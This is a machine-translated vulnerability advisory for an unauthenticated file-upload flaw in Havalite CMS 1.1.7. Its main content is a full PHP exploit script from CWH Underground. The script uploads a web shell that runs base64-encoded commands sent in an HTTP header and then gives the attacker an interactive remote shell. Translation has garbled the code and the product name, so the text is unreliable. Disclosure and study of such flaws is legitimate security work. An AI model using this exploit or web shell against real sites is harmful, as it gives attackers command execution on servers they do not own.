Havw.cms upload. php File upload Arbitrary Code Execution Vulnerability

Release date:
Updated on: 2013-07-13

Affected Systems:
Havbid CMS 1.1.7
Description:
--------------------------------------------------------------------------------
Havbid is an open-source lightweight CMS blog program developed based on PHP and SQLite.

Upload. the php script does not properly verify or filter files uploaded by users. If an attacker places a file in the accessible path of the user, the attacker directly requests the file to allow the user to execute the script with Web Server permissions.

<* Source: CWH Underground (www.citecclub.org)

Link: http://www.metasploit.com/modules/exploit/unix/webapp/havalite_upload_exec
Http://www.osvdb.org/94405
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php

/*

, -- ^ ----------, --------, -----, ------- ^ --,
| '--------' | O... CWH Underground Hacking Team ..
'+ --------------------------- ^ ---------- |
'\ _, -------, _____________________ |
/XXXXXX/'|/
/XXXXXX /'\/
/XXXXXX /\______(
/XXXXXX/
/XXXXXX/
(________(
'------'

Exploit Title: Havalite CMS Unrestricted File Upload Exploit
Date: 16 jun 2013
Exploit Author: CWH Underground
Site: www.2600.in. th
Vendor Homepage: http://havalite.com/
Software Link: http://jaist.dl.sourceforge.net/project/havalite/havalite_1.1.7.zip
Version: 1.1.7
Tested on: Window and Linux


######################################## #############
VULNERABILITY: Unrestricted File Upload
######################################## #############

/Havbid/upload. php

######################################## #############
DESCRIPTION
######################################## #############

Restricted access to this script isn' t properly realized (Don't require authentication ),
So an attacker might be able to upload arbitrary files containing malicous PHP code due to uploaded file
Extension isn' t properly checked.
 

######################################## #############
EXPLOIT
######################################## #############

*/

Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );

Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No response from {$ host}: 80 \ n ");

Fputs ($ sock, $ packet );
Return stream_get_contents ($ sock );
}

Print "\ n + ------------------------------------------------- + ";
Print "\ n | Havalite CMS Unrestricted File Upload Exploit | ";
Print "\ n + ------------------------------------------------- + \ n ";

If ($ argc <3)
{
Print "\ nUsage...: php $ argv [0] Print "\ nExample...: php $ argv [0] localhost /";
Print "\ nExample...: php $ argv [0] localhost/havalite/\ n ";
Die ();
}

$ Host = $ argv [1];
$ Path = $ argv [2];
 

$ Payload = "-- o0oOo0o \ r \ n ";
$ Payload. = "Content-Disposition: form-data; name = \" files [] \ "; filename = \" sh. php \ "\ r \ n ";
$ Payload. = "Content-Type: application/octet-stream \ r \ n ";
$ Payload. = "<? Php error_reporting (0); print (___); passthru (base64_decode (\ $ _ SERVER [HTTP_CMD]); \ r \ n ";
$ Payload. = "-- o0oOo0o -- \ r \ n ";

$ Packet = "POST {$ path} havbid/upload. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Referee: {$ host} {$ path} havalite/hava_upload.php \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: multipart/form-data; boundary = o0oOo0o \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";

Http_send ($ host, $ packet );

$ Packet = "GET {$ path}/havalite/tmp/files/sh. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";

While (1)
{
Print "\ nHavalite-shell #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
$ Response = http_send ($ host, sprintf ($ packet, base64_encode ($ cmd )));
Preg_match ('/___ (. *)/s', $ response, $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}

?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Havbid
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://havalite.com/